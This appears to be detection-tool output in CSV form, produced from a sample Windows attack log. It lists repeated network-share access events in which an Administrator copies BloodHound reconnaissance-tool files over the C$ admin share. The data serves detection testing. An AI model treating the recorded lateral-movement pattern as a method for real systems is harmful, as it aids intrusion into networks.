2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inflight  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inherits  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\plugins  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\static  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\utils  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\invariant  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\isarray  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\is-obj  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\is-zip-file  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\external  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\external\sizzle  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\ajax  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\attributes  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\core  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\css  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\data  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\deferred  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\effects  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\event  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\exports  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\manipulation  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\queue  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\traversing  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\var  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\js-tokens  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jszip  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode\examples  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode\test  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.798 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\dist\plugins  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.gexf  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.graphml  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.image  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.json  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.spreadsheet  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.svg  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.xlsx  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.helpers.graph  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.dagre  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.forceAtlas2  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.forceLink  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.fruchtermanReingold  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.noverlap  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.cypher  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.gexf  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.json  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.pathfinding.astar  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.activeState  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.animate  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.colorbrewer  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
